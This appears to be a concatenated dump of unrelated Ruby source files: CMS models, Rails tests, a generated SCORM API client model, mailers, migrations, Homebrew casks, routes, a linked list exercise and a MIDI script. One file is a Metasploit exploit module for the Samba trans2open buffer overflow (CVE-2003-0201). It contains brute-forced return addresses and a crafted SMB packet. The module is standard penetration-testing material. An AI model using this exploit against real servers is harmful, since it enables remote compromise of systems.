include Cms::Addon::MaxFileSizeSetting
include Cms::Addon::GroupPermission
include History::Addon::Backup
include Cms::ChildList
default_scope ->{ where(route: "cms/page") }
end
class ImportNode
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::Meta
include Cms::Addon::PageList
include Cms::Addon::Release
include Cms::Addon::GroupPermission
include History::Addon::Backup
include Cms::Addon::Import::Page
default_scope ->{ where(route: "cms/import_node") }
end
class Archive
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::Meta
include Cms::Addon::ArchiveViewSwitcher
include Cms::Addon::PageList
include Cms::Addon::Release
include Cms::Addon::GroupPermission
include History::Addon::Backup
default_scope ->{ where(route: "cms/archive") }
end
class GroupPage
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::PageGroupList
include History::Addon::Backup
default_scope ->{ where(route: "cms/group_page") }
end
class PhotoAlbum
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::Meta
include Cms::Addon::PageList
include Cms::Addon::Release
include Cms::Addon::GroupPermission
include History::Addon::Backup
default_scope ->{ where(route: "cms/photo_album") }
def condition_hash
cond = []
cond << { filename: /^#{filename}\// } if conditions.blank?
conditions.each do |url|
node = Cms::Node.site(cur_site || site).filename(url).first rescue nil
next unless node
cond << { filename: /^#{node.filename}\//, depth: node.depth + 1 }
end
{ '$or' => cond }
end
end
end
| 27 | 78 | 0.678466 |
f8b4c03d4de979f5aa1157475a9a17106c089e2f | 595 | require 'test_helper'
class SessionsControllerTest < ActionController::TestCase
test "should get new" do
get :new
assert_response :success
end
test "should login" do
jarvis = users(:one)
post :create, name: jarvis.name, password: 'secret'
assert_redirected_to admin_url
assert_equal jarvis.id, session[:user_id]
end
test "should fail login" do
jarvis = users(:one)
post :create, name: jarvis.name, password: 'wrong'
assert_redirected_to login_url
end
test "should logout" do
delete :destroy
assert_redirected_to store_url
end
end
| 21.25 | 57 | 0.710924 |
bff6fe93268fef00554534ffd9d2ce1a2e521357 | 9,124 | =begin
#SCORM Cloud Rest API
#REST API used for SCORM Cloud integrations.
OpenAPI spec version: 2.0 beta
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.3
=end
require 'date'
module RusticiSoftwareCloudV2
class CreateRegistrationSchema
attr_accessor :course_id
attr_accessor :learner
attr_accessor :registration_id
# The xapiRegistrationId to be associated with this registration. If not specified, the system will assign an xapiRegistrationId. As per the xApi specification, this must be a UUID.
attr_accessor :xapi_registration_id
attr_accessor :learner_tags
attr_accessor :course_tags
attr_accessor :registration_tags
# Specifies an optional override URL for which to post activity and status data in real time as the course is completed. By default all of these settings are read from your configuration.
attr_accessor :post_back
attr_accessor :initial_registration_state
attr_accessor :initial_settings
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'course_id' => :'courseId',
:'learner' => :'learner',
:'registration_id' => :'registrationId',
:'xapi_registration_id' => :'xapiRegistrationId',
:'learner_tags' => :'learnerTags',
:'course_tags' => :'courseTags',
:'registration_tags' => :'registrationTags',
:'post_back' => :'postBack',
:'initial_registration_state' => :'initialRegistrationState',
:'initial_settings' => :'initialSettings'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'course_id' => :'String',
:'learner' => :'LearnerSchema',
:'registration_id' => :'String',
:'xapi_registration_id' => :'String',
:'learner_tags' => :'Array<String>',
:'course_tags' => :'Array<String>',
:'registration_tags' => :'Array<String>',
:'post_back' => :'PostBackSchema',
:'initial_registration_state' => :'RegistrationSchema',
:'initial_settings' => :'SettingsPostSchema'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'courseId')
self.course_id = attributes[:'courseId']
end
if attributes.has_key?(:'learner')
self.learner = attributes[:'learner']
end
if attributes.has_key?(:'registrationId')
self.registration_id = attributes[:'registrationId']
end
if attributes.has_key?(:'xapiRegistrationId')
self.xapi_registration_id = attributes[:'xapiRegistrationId']
end
if attributes.has_key?(:'learnerTags')
if (value = attributes[:'learnerTags']).is_a?(Array)
self.learner_tags = value
end
end
if attributes.has_key?(:'courseTags')
if (value = attributes[:'courseTags']).is_a?(Array)
self.course_tags = value
end
end
if attributes.has_key?(:'registrationTags')
if (value = attributes[:'registrationTags']).is_a?(Array)
self.registration_tags = value
end
end
if attributes.has_key?(:'postBack')
self.post_back = attributes[:'postBack']
end
if attributes.has_key?(:'initialRegistrationState')
self.initial_registration_state = attributes[:'initialRegistrationState']
end
if attributes.has_key?(:'initialSettings')
self.initial_settings = attributes[:'initialSettings']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @course_id.nil?
invalid_properties.push('invalid value for "course_id", course_id cannot be nil.')
end
if @learner.nil?
invalid_properties.push('invalid value for "learner", learner cannot be nil.')
end
if @registration_id.nil?
invalid_properties.push('invalid value for "registration_id", registration_id cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @course_id.nil?
return false if @learner.nil?
return false if @registration_id.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
course_id == o.course_id &&
learner == o.learner &&
registration_id == o.registration_id &&
xapi_registration_id == o.xapi_registration_id &&
learner_tags == o.learner_tags &&
course_tags == o.course_tags &&
registration_tags == o.registration_tags &&
post_back == o.post_back &&
initial_registration_state == o.initial_registration_state &&
initial_settings == o.initial_settings
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[course_id, learner, registration_id, xapi_registration_id, learner_tags, course_tags, registration_tags, post_back, initial_registration_state, initial_settings].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
          # check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = RusticiSoftwareCloudV2.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
    # @return [String] String representation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 31.680556 | 191 | 0.636234 |
e98fa9d9ea240c5a578c28aea8260be1493c5a0c | 4,885 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba trans2open Overflow (Linux x86)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the flaw on x86 Linux systems that do not
have the noexec stack option set.
NOTE: Some older versions of RedHat do not seem to be vulnerable
since they apparently do not allow anonymous access to IPC.
},
'Author' => [ 'hdm', 'jduck' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2003-0201' ],
[ 'OSVDB', '4469' ],
[ 'BID', '7294' ],
[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
'StackAdjustment' => -3500
},
'Platform' => 'linux',
'Targets' =>
[
# tested OK - jjd:
# RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc
# RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc
[ 'Samba 2.2.x - Bruteforce',
{
'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
'Offset' => 1055,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbffffdfc },
'Stop' => { 'Ret' => 0xbfa00000 },
'Step' => 256
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 7 2003'
))
register_options(
[
Opt::RPORT(139)
])
end
def brute_exploit(addrs)
curr_ret = addrs['Ret']
begin
print_status("Trying return address 0x%.8x..." % curr_ret)
connect
smb_login
if ! @checked_peerlm
if smb_peer_lm !~ /samba/i
fail_with(Failure::NoTarget, "This target is not a Samba server (#{smb_peer_lm}")
end
if smb_peer_lm =~ /Samba [34]\./i
fail_with(Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")
end
end
@checked_peerlm = true
# This value *must* be 1988 to allow findrecv shellcode to work
# XXX: I'm not sure the above comment is true...
pattern = rand_text_english(1988)
# See the OSX and Solaris versions of this module for additional
# information.
# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
# (rpmbuild -bp ; edited/reran config.status ; make)
eip_off = target['Offset']
ptr_to_non_zero = target['PtrToNonZero']
# Stuff the shellcode into the request
pattern[0, payload.encoded.length] = payload.encoded
# We want test true here, so we overwrite conn with a pointer
# to something non-zero.
#
# 222 if (IS_IPC(conn)) {
# 223 return(ERROR(ERRSRV,ERRaccess));
# 224 }
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
# We want to avoid crashing on the following two derefences.
#
# 116 int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)
# 117 {
# 118 int outsize = set_message(outbuf,0,0,True);
# 119 int cmd = CVAL(inbuf,smb_com);
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
# This stream covers the framepointer and the return address
#pattern[1199, 400] = [curr_ret].pack('N') * 100
pattern[eip_off, 4] = [curr_ret].pack('V')
trans =
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
pattern
# puts "press any key"; $stdin.gets
sock.put(trans)
handler
rescue ::EOFError
rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError
raise $!
rescue ::Exception => e
print_error("#{rhost} #{e}")
end
handler
disconnect
end
end
| 31.720779 | 103 | 0.555169 |
03eb7568b991079489e7e10181f4c51c673dd0f7 | 367 | module Pageflow
class UserMailer < ActionMailer::Base
def invitation(options)
@user = options[:user]
@password_token = options[:password_token]
I18n.with_locale(@user.locale) do
headers('X-Language' => I18n.locale)
mail(to: @user.email, subject: t('.subject'), from: Pageflow.config.mailer_sender)
end
end
end
end
| 26.214286 | 90 | 0.656676 |
08db2575bef2599c9317abff9af528afb1c46e4d | 364 | class CreateBudgets < ActiveRecord::Migration
def change
create_table :budgets do |t|
t.references :user, index: true, null: false
t.references :category, index: true, null: false
t.references :currency, index: true, null: false
t.decimal :limit, null: false, precision: 10, scale: 2
t.timestamps null: false
end
end
end
| 28 | 60 | 0.673077 |
79eedd6182fcd6b63b5cba29642088efdf767447 | 2,451 | cask 'firefox-esr' do
version '60.1.0'
language 'cs' do
sha256 '8fd11e84e2a13b905709b48551348ddaaa65d39c0f1e0fbc925ef9600225bf78'
'cs'
end
language 'de' do
sha256 '769db2010a2a92b3f9d2e64925768e7dd400ecdf7d99c4d788ab7ac016ea1a54'
'de'
end
language 'en-GB' do
sha256 '893dda71ed99782a30bee944ba57720ff7a4edff63d4ceab1fdc352cbfbd6671'
'en-GB'
end
language 'en', default: true do
sha256 '26e4e7443b22bdce63d7d135ea7df569d38386d0869154a026e96f19d1f8b63a'
'en-US'
end
language 'fr' do
sha256 '16070e8f3b36a04376ff2c1ef0382b6519b24d5f83843a44d8a263f10642892f'
'fr'
end
language 'gl' do
sha256 '2e04720319d67f594c06c8c97d5dde51a5d3b0ff285d067514faa3cc99a65f26'
'gl'
end
language 'it' do
sha256 '9cc07e009364ae90cdda51a184ae7abc111f9d510ff73c2367ab6fc7a0c41c47'
'it'
end
language 'ja' do
sha256 '4fe1d14529b04e7c406981129ebcd9b0b3bb7e159ede8c361b62d089e59fcf80'
'ja-JP-mac'
end
language 'nl' do
sha256 '0ea15badef338c912fadb720802dd7bdcad576094dbbd05c4a4e1c8f9dd02dca'
'nl'
end
language 'pl' do
sha256 'f00a492166de13254f475dcdf4b5c7310a0afa1f7a744ca387ca90c53a5e350e'
'pl'
end
language 'pt' do
sha256 'a2b40213b65c6f8d295407bb28fe9fdaf65564fc83ec47ed0a48e00eb8102112'
'pt-PT'
end
language 'ru' do
sha256 '9dec76aaaa4cbd0599cbb28f6a529c8e182a78fcc2f7fc251c26e25d4c25eaf3'
'ru'
end
language 'uk' do
sha256 'c5fa57d5ebf5e5fcfff451ed62474e210c86eb70449ffb04a01c2183ff952e8b'
'uk'
end
language 'zh-TW' do
sha256 'c0b3daef788308e2bc683f3f5df522018c26226aa2ffc356ecd3796ea40f7232'
'zh-TW'
end
language 'zh' do
sha256 '463e5227268ede163e4dde98de7e9105710c3ac93e03ac88fc93680d1091b99f'
'zh-CN'
end
# download-installer.cdn.mozilla.net/pub/firefox/releases was verified as official when first introduced to the cask
url "https://download-installer.cdn.mozilla.net/pub/firefox/releases/#{version}esr/mac/#{language}/Firefox%20#{version}esr.dmg"
name 'Mozilla Firefox ESR'
name 'Mozilla Firefox Extended Support Release'
homepage 'https://www.mozilla.org/firefox/organizations/'
conflicts_with cask: [
'firefox',
'firefox-beta',
]
app 'Firefox.app'
zap trash: [
'~/Library/Application Support/Firefox',
'~/Library/Caches/Firefox',
]
end
| 25.268041 | 129 | 0.72501 |
bfaecdb65818d11b62ae8b60b4516d1ebebf0acd | 3,423 | # frozen_string_literal: true
class BaseMailer < ActionMailer::Base
self.mailer_name = "base_mailer"
default to: "[email protected]",
from: "[email protected]",
reply_to: "[email protected]"
def welcome(hash = {})
headers["X-SPAM"] = "Not SPAM"
mail({ subject: "The first email on new API!" }.merge!(hash))
end
def welcome_with_headers(hash = {})
headers hash
mail
end
def welcome_from_another_path(path)
mail(template_name: "welcome", template_path: path)
end
def html_only(hash = {})
mail(hash)
end
def plain_text_only(hash = {})
mail(hash)
end
def inline_attachment
attachments.inline["logo.png"] = "\312\213\254\232"
mail
end
def attachment_with_content(hash = {})
attachments["invoice.pdf"] = "This is test File content"
mail(hash)
end
def attachment_with_hash
attachments["invoice.jpg"] = { data: ::Base64.encode64("\312\213\254\232)b"),
mime_type: "image/x-jpg",
transfer_encoding: "base64" }
mail
end
def attachment_with_hash_default_encoding
attachments["invoice.jpg"] = { data: "\312\213\254\232)b",
mime_type: "image/x-jpg" }
mail
end
def implicit_multipart(hash = {})
attachments["invoice.pdf"] = "This is test File content" if hash.delete(:attachments)
mail(hash)
end
def implicit_with_locale(hash = {})
mail(hash)
end
def explicit_multipart(hash = {})
attachments["invoice.pdf"] = "This is test File content" if hash.delete(:attachments)
mail(hash) do |format|
format.text { render plain: "TEXT Explicit Multipart" }
format.html { render plain: "HTML Explicit Multipart" }
end
end
def explicit_multipart_templates(hash = {})
mail(hash) do |format|
format.html
format.text
end
end
def explicit_multipart_with_any(hash = {})
mail(hash) do |format|
format.any(:text, :html) { render plain: "Format with any!" }
end
end
def explicit_without_specifying_format_with_any(hash = {})
mail(hash) do |format|
format.any
end
end
def explicit_multipart_with_options(include_html = false)
mail do |format|
format.text(content_transfer_encoding: "base64") { render "welcome" }
format.html { render "welcome" } if include_html
end
end
def explicit_multipart_with_one_template(hash = {})
mail(hash) do |format|
format.html
format.text
end
end
def implicit_different_template(template_name = "")
mail(template_name: template_name)
end
def explicit_different_template(template_name = "")
mail do |format|
format.text { render template: "#{mailer_name}/#{template_name}" }
format.html { render template: "#{mailer_name}/#{template_name}" }
end
end
def different_layout(layout_name = "")
mail do |format|
format.text { render layout: layout_name }
format.html { render layout: layout_name }
end
end
def email_with_translations
mail body: render("email_with_translations", formats: [:html])
end
def without_mail_call
end
def with_nil_as_return_value
mail(template_name: "welcome")
nil
end
def with_subject_interpolations
mail(subject: default_i18n_subject(rapper_or_impersonator: "Slim Shady"), body: "")
end
end
| 24.625899 | 89 | 0.654105 |
284640ee547b89db665ca98b1d840455c3f06157 | 962 | require "conjoin/version"
require "dominate/inflectors"
# require "conjoin/recursive_ostruct"
require "conjoin/middleware"
require "conjoin/env_string"
require "conjoin/class_methods"
require "conjoin/cuba"
require "conjoin/seeds"
module Conjoin
extend ClassMethods
autoload :ActiveRecord, "conjoin/active_record"
autoload :Assets , "conjoin/assets"
autoload :Auth , "conjoin/auth"
autoload :Environment , "conjoin/environment"
autoload :FormBuilder , "conjoin/form_builder"
autoload :I18N , "conjoin/i18n"
autoload :Widgets , "conjoin/widgets"
autoload :Csrf , "conjoin/csrf"
autoload :As , "conjoin/as"
autoload :Ui , "conjoin/ui"
autoload :JQuery , "conjoin/jquery"
autoload :Nav , "conjoin/nav"
autoload :AuthToken , "conjoin/auth_token"
# ActionMailer
# https://gist.github.com/acwright/1944639
# DelayedJob
# https://gist.github.com/robhurring/732327
end
| 31.032258 | 49 | 0.698545 |
f858d52e7519597876d3f50eb129a9685d235889 | 1,296 | module Swagger
module V1
module Resources
module Apress
module AmazonAssets
class AssetsController < ::Apress::Documentation::Swagger::Schema
swagger_path('/asssets/{id}') do
operation :get do
key :produces, ['application/json']
key :description,
"-" \
"<h4>Allowed user roles:</h4> User."
key :operationId, 'asssetShow'
key :tags, ['amazon_assets']
parameter do
key :name, :id
key :in, :path
key :description, "ИД ассета"
key :type, :integer
key :format, :int64
end
response 200 do
key :description, 'Success response'
schema type: 'object' do
property :asset do
key :'$ref', :'Swagger::V1::Models::Apress::AmazonAssets::Asset'
end
end
end
extend Swagger::V1::DefaultResponses::Unauthenticated
extend Swagger::V1::DefaultResponses::NotFound
end
end
end
end
end
end
end
end
| 29.454545 | 86 | 0.449846 |
d57c9e56f5673b9d42609df9cf2334d5de35f7c2 | 1,086 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'materialistic/version'
Gem::Specification.new do |spec|
spec.name = "materialistic"
spec.version = Materialistic::VERSION
spec.authors = ["Yasuaki Uechi"]
spec.email = ["[email protected]"]
spec.summary = %q{Clarify materials by MPN, SKU and vague material name.}
spec.description = %q{Clarify materials by MPN, SKU and vague material name.}
spec.homepage = "https://github.com/uetchy/materialistic"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.7"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec"
spec.add_development_dependency "webmock"
spec.add_development_dependency "vcr"
spec.add_development_dependency "pry-byebug"
spec.add_dependency "mechanize"
end
| 37.448276 | 81 | 0.694291 |
e8c346b3d97dbc066f432bcd20b2461d3aaee2e7 | 401 | require 'spec_helper'
module GPhoto2
describe Port do
before do
allow_any_instance_of(Port).to receive(:new)
end
describe '#info=' do
let(:port) { Port.new }
before do
allow(port).to receive(:set_info)
end
it 'returns the input value' do
info = double(:port_info)
expect(port.info = info).to eq(info)
end
end
end
end
| 17.434783 | 50 | 0.59601 |
61d93b809e504568fe3712dcef3853ce1133179e | 1,608 | #!/usr/bin/env ruby
gem 'minitest', '>= 5.0.0'
require 'minitest/autorun'
require_relative 'binary'
class BinaryTest < Minitest::Test
def test_binary_0_is_decimal_0
assert_equal 0, Binary.new('0').to_decimal
end
def test_binary_1_is_decimal_1
assert_equal 1, Binary.new('1').to_decimal
end
def test_binary_10_is_decimal_2
assert_equal 2, Binary.new('10').to_decimal
end
def test_binary_11_is_decimal_3
assert_equal 3, Binary.new('11').to_decimal
end
def test_binary_100_is_decimal_4
assert_equal 4, Binary.new('100').to_decimal
end
def test_binary_1001_is_decimal_9
assert_equal 9, Binary.new('1001').to_decimal
end
def test_binary_11010_is_decimal_26
assert_equal 26, Binary.new('11010').to_decimal
end
def test_binary_10001101000_is_decimal_1128
assert_equal 1128, Binary.new('10001101000').to_decimal
end
def test_binary_ignores_leading_zeros
assert_equal 31, Binary.new('000011111').to_decimal
end
def test_invalid_binary_numbers_raise_an_error
%w(012 10nope nope10).each do |input|
assert_raises ArgumentError do
Binary.new(input)
end
end
end
# Problems in exercism evolve over time,
# as we find better ways to ask questions.
# The version number refers to the version of the problem you solved,
# not your solution.
#
# Define a constant named VERSION inside of Binary.
# If you're curious, read more about constants on RubyDoc:
# http://ruby-doc.org/docs/ruby-doc-bundle/UsersGuide/rg/constants.html
def test_bookkeeping
assert_equal 1, Binary::VERSION
end
end
| 25.52381 | 73 | 0.745647 |
386bd023ea25e5baeefc793533d1865b03566c6e | 1,318 | lib = File.expand_path('lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'chloride/version'
Gem::Specification.new do |spec|
spec.name = 'chloride'
spec.version = Chloride::VERSION
spec.authors = ['Brandon High', 'Eric Williamson', 'Nick Lewis']
spec.email = ['[email protected]', '[email protected]', '[email protected]']
spec.summary = 'A simple streaming NetSSH implementation'
# spec.description = %q{TODO: More verbose description here.}
spec.homepage = 'https://github.com/puppetlabs/chloride'
spec.license = 'Apache-2.0'
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(\..*|(test|spec|features)/)})
end
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.required_ruby_version = '~> 2.4'
spec.add_development_dependency 'bundler'
spec.add_development_dependency 'gem-release'
spec.add_development_dependency 'pry'
spec.add_development_dependency 'rake', '~> 11'
spec.add_development_dependency 'rspec', '~> 3'
spec.add_development_dependency 'rubocop'
spec.add_development_dependency 'simplecov'
spec.add_dependency 'net-scp'
spec.add_dependency 'net-ssh'
end
| 37.657143 | 99 | 0.685888 |
d5d808eab72a4bd81821ed359ab48bbd2bb606cc | 1,479 | require_relative 'node'
class LinkedList
attr_reader :head
def initialize
@head = nil
end
# Time complexity - O(1)
# Space complexity - O(1)
def add_first(data)
if @head
new_node = Node.new(data, @head)
@head = new_node
else
@head = Node.new(data)
end
end
# Time complexity - O(1)
# Space complexity - O(1)
def get_first
if @head.nil?
return nil
else
return @head.data
end
end
# Time complexity - O(n)
# Space complexity - O(1)
def length
current = @head
len = 0
until current.nil?
len += 1
current = current.next
end
return len
end
# Time complexity - O(n)
# Space complexity - O(1)
def add_last(data)
if @head
current = @head
until current.next.nil?
current = current.next
end
new_node = Node.new(data)
current.next = new_node
else
@head = Node.new(data)
end
end
# Time complexity - O(n)
# Space complexity - O(1)
def get_last
if @head.nil?
return nil
else
current = @head
until current.next.nil?
current = current.next
end
return current.data
end
end
# Time complexity - O(n)
# Space complexity - O(1)
def get_at_index(index)
if @head.nil? || index >= length
return nil
else
current = @head
index.times do
current = current.next
end
return current.data
end
end
end
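# A minimal usage sketch (illustrative, not part of the original exercise);
# it assumes the companion Node class in node.rb exposes `data` and a
# writable `next`, as the methods above rely on.
#
#   list = LinkedList.new
#   list.add_first(2)
#   list.add_last(5)
#   list.get_first        # => 2
#   list.get_last         # => 5
#   list.get_at_index(1)  # => 5
#   list.length           # => 2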
| 16.617978 | 38 | 0.57336 |
625bd52d58a2e2838cf0705074840660f7693bf2 | 140 | module Wrxer
class CommentCollection
include Collection
xpath "item"
collection :comments, "//wp:comment", Comment
end
end
| 15.555556 | 49 | 0.707143 |
18a031b23b26c70a1cc170aa13ddb5a4f6c3b88e | 325 | class CreateProducts < ActiveRecord::Migration[5.2]
def change
create_table :products do |t|
t.string :title
t.text :description
t.decimal :price
t.decimal :size
t.boolean :is_spicy
t.boolean :is_veg
t.boolean :is_best_offer
t.string :path_to_image
t.timestamps
end
end
end
| 19.117647 | 51 | 0.670769 |
010bc39db455cd1c5c6c7ea4a7141c2f613d1675 | 4,219 | ActionController::Routing::Routes.draw do |map|
# Add your own custom routes here.
# The priority is based upon order of creation: first created -> highest priority.
# Here's a sample route:
# map.connect 'products/:id', :controller => 'catalog', :action => 'view'
# Keep in mind you can assign values other than :controller and :action
# You can have the root of your site routed by hooking up ''
# -- just remember to delete public/index.html.
map.connect '', :controller => 'main', :action => 'index'
map.connect 'admin', :controller => 'admin/dashboard', :action => 'index'
map.connect 'admin/projects/:action/:id', :controller => 'admin/projects'
map.connect 'admin/milestones/:action', :controller => "admin/milestones"
map.connect 'admin/categories/:action/:id', :controller => 'admin/categories'
map.connect 'admin/tags/:action/:id', :controller => 'admin/tags'
map.connect 'rss/tickets', :controller => 'rss', :action => 'tickets'
map.connect ':project/repository/browse/*path',
:controller => 'repository',
:action => 'browse'
map.connect 'repository/browse/*path',
:controller => 'repository',
:action => 'browse'
# "Routing Error: Path components must occur last" :(
#map.connect 'repository/browse/*path/rev/:rev',
# :controller => 'repository',
# :action => 'browse',
# :rev => /\d+/
# TODO: Rework this into a general browse/view_file usable thing
#map.connect 'repository/file/rev/:rev/*path',
# :controller => 'repository',
# :action => 'view_file',
# :rev => /\d+/
map.connect ':project/repository/file/*path',
:controller => 'repository',
:action => 'view_file'
map.connect 'repository/file/*path',
:controller => 'repository',
:action => 'view_file'
map.connect ':project/repository/revisions/*path',
:controller => 'repository',
:action => 'revisions'
map.connect 'repository/revisions/*path',
:controller => 'repository',
:action => 'revisions'
map.connect ':project/repository/changesets',
:controller => 'repository',
:action => 'changesets'
map.connect ':project/repository/changesets/:revision',
:controller => 'repository',
:action => 'show_changeset'
map.connect 'repository/changesets/:revision',
:controller => 'repository',
:action => 'show_changeset'
map.connect ':project/tickets',
:controller => 'tickets',
:action => 'index'
map.connect ':project/releases/:action/:id',
:controller => 'releases'
map.connect 'tickets',
:controller => 'tickets'
map.connect ':project/tickets/new',
:controller => 'tickets',
:action => 'new'
map.connect ':project/components/:action/:id',
:controller => "components"
map.connect ':project/tickets/:id',
:controller => 'tickets',
:action => 'show',
:requirements => { :id => /\d+/ }
map.connect 'tickets/:id',
:controller => 'tickets',
:action => 'show',
:requirements => { :id => /\d+/ }
map.connect ':project/milestones',
:controller => 'milestones',
:action => 'index'
map.connect ':project/milestones/:id',
:controller => 'milestones',
:action => 'show'
map.connect ':project/search',
:controller => 'search'
map.connect ':project',
:controller => 'main'
#map.projects 'projects',
# :controller => "projects",
# :action => 'index'
map.connect ':controller/:action/:id'
# Allow downloading Web Service WSDL as a file with an extension
# instead of a file named 'wsdl'
#map.connect ':controller/service.wsdl', :action => 'wsdl'
end
| 34.024194 | 84 | 0.546812 |
4a913adaf292282cee52409fa0cdf9cc6c75d22a | 288 | # frozen_string_literal: true
class CreateUserEvents < ActiveRecord::Migration[6.0]
def change
create_table :user_events do |t|
t.references :user, null: false, foreign_key: true
t.references :event, null: false, foreign_key: true
t.timestamps
end
end
end
| 22.153846 | 57 | 0.704861 |
6113b2c43943427a315d592f513801295cc82892 | 363 | require 'rubygems'
require 'midiator'
midi = MIDIator::Interface.new
midi.autodetect_driver
include MIDIator::Notes
C4MAJ = [ C4, E4, G4 ]
F4MAJII = [ C4, F4, A4 ]
G4MAJ = [ D4, G4, B4 ]
song = [ C3, C4MAJ, C3, C4MAJ, F3, F4MAJII, F3, F4MAJII, G3, G4MAJ, G3, G4MAJ, C5, C4MAJ, C2, C4MAJ]
4.times do
song.each do |note|
midi.play note, 0.25
end
end
| 17.285714 | 100 | 0.652893 |
ff46ec7b8ee8de563fa798e4873fc21c959befd1 | 1,882 | require "sidekiq/web"
